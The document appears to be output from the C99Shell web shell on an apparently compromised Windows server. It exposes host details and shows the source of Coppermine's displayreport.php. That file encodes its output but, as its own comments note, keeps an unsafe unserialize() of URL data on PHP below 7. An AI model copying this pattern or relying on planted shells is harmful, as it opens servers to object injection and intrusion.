!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\cpg1418\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]


Viewing file:     displayreport.php (3.35 KB)      -rw-rw-rw-
<?php
/*************************
  Coppermine Photo Gallery
  ************************
  Copyright (c) 2003-2008 Dev Team
  v1.1 originally written by Gregory DEMAR

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License version 3
  as published by the Free Software Foundation.
  
  ********************************************
  Coppermine version: 1.4.18
  $HeadURL: https://coppermine.svn.sourceforge.net/svnroot/coppermine/trunk/cpg1.4.x/displayreport.php $
  $Revision: 4380 $
  $Author: gaugau $
  $Date: 2008-04-12 12:00:19 +0200 (Sa, 12 Apr 2008) $
**********************************************/

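// Renders a report (about a picture or a comment) for a gallery administrator.
// The report fields arrive as a base64-encoded, PHP-serialized array in the
// `data` query parameter and are substituted into one of two templates.

// Constants defined before the includes; presumably checked by the include
// files to refuse direct access - confirm in include/init.inc.php.
define('IN_COPPERMINE', true);
define('DISPLAYREPORT_PHP', true);

require('include/init.inc.php');
require('include/smilies.inc.php');

// Administrators only. This check runs before any request data is decoded;
// cpg_die() is expected to end the request (defined elsewhere).
if (!GALLERY_ADMIN_MODE) {
    cpg_die(ERROR, $lang_errors['access_denied'], __FILE__, __LINE__);
}

if (!isset($_GET['data'])) {
    cpg_die(CRITICAL_ERROR, $lang_errors['param_missing'], __FILE__, __LINE__);
}

// A non-string value (e.g. data[]=x) is treated as an empty payload and
// falls through to the 'invalid_data' branch below.
$raw = is_string($_GET['data']) ? base64_decode($_GET['data']) : '';

// SECURITY: unserialize() on request-controlled bytes can instantiate
// arbitrary loaded classes and run their magic methods (PHP object
// injection). The admin check above limits who reaches this line but does
// not make the payload trustworthy, because the value comes from the URL.
// On PHP 7+ object instantiation is disabled via allowed_classes. Older
// runtimes have no such switch, so the legacy call is kept and flagged here.
// The durable fix is to stop accepting serialized data from the request:
// use a server-side record id or an authenticated (HMAC-signed) payload.
// That requires changing the code that builds the link as well.
if (defined('PHP_VERSION_ID') && PHP_VERSION_ID >= 70000) {
    $data = @unserialize($raw, array('allowed_classes' => false));
} else {
    $data = @unserialize($raw);
}

if (is_array($data)) {
    // The payload cannot be trusted, so every field is reduced to a string
    // and HTML-encoded before it reaches a template. The replacement is
    // byte-wise, so it does not depend on the configured charset. Missing
    // or non-scalar fields become '' instead of raising notices.
    // NOTE(review): if the page that builds the payload already
    // entity-encodes these fields they will display double-encoded here;
    // confirm against that code.
    $entity_map = array(
        '&' => '&amp;',
        '<' => '&lt;',
        '>' => '&gt;',
        '"' => '&quot;',
        "'" => '&#039;',
    );
    $fields = array('t', 'sn', 'se', 'su', 'm', 'r', 'c', 'cid', 'pid', 'p');
    $clean = array();
    foreach ($fields as $key) {
        $value = (isset($data[$key]) && is_scalar($data[$key])) ? (string) $data[$key] : '';
        $clean[$key] = strtr($value, $entity_map);
    }
    $data = $clean;

    $charset = $CONFIG['charset'] == 'language file' ? $lang_charset : $CONFIG['charset'];
    $picture_link = "{$CONFIG['ecards_more_pic_target']}displayimage.php?pos=-" . $data['pid'];

    // Placeholders shared by both templates.
    $params = array(
        '{LANG_DIR}' => $lang_text_dir,
        '{TITLE}' => sprintf($lang_report_php['report_subject'], $data['sn'], $data['t']),
        '{CHARSET}' => $charset,
        '{VIEW_REPORT_TGT}' => '',
        '{VIEW_REPORT_LNK}' => '',
        '{URL_PREFIX}' => '',
        '{SUBJECT}' => $data['su'],
        // process_smilies() is defined elsewhere; it receives the already
        // encoded message, so any markup it adds is the only HTML in it.
        '{MESSAGE}' => nl2br(process_smilies($data['m'])),
        '{SENDER_EMAIL}' => $data['se'],
        '{SENDER_NAME}' => $data['sn'],
        '{VIEW_MORE_TGT}' => $CONFIG['ecards_more_pic_target'],
        '{VIEW_MORE_LNK}' => $lang_report_php['view_more_pics'],
        '{REASON}' => $data['r'],
        '{PID}' => $data['pid'],
    );

    if ($data['t'] === 'comment') {
        // Report on a comment: add the comment text and a link to it.
        $params += array(
            '{COMMENT}' => $data['c'],
            '{COMMENT_ID}' => $data['cid'],
            '{VIEW_COMMENT_LNK}' => $lang_report_php['view_comment'],
            '{COMMENT_LNK}' => $lang_report_php['go_comment'],
            '{COMMENT_TGT}' => $picture_link . "#comment" . $data['cid'],
        );
        echo template_eval($template_report_comment, $params);
    } else {
        // Report on a picture: add the picture URL and its display link.
        $params += array(
            '{PIC_URL}' => $data['p'],
            '{PIC_TGT}' => $picture_link,
        );
        echo template_eval($template_report, $params);
    }
} else {
    // Not an array: malformed base64, a failed unserialize, or a non-array value.
    cpg_die(CRITICAL_ERROR, $lang_report_php['invalid_data'], __FILE__, __LINE__);
}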
?>
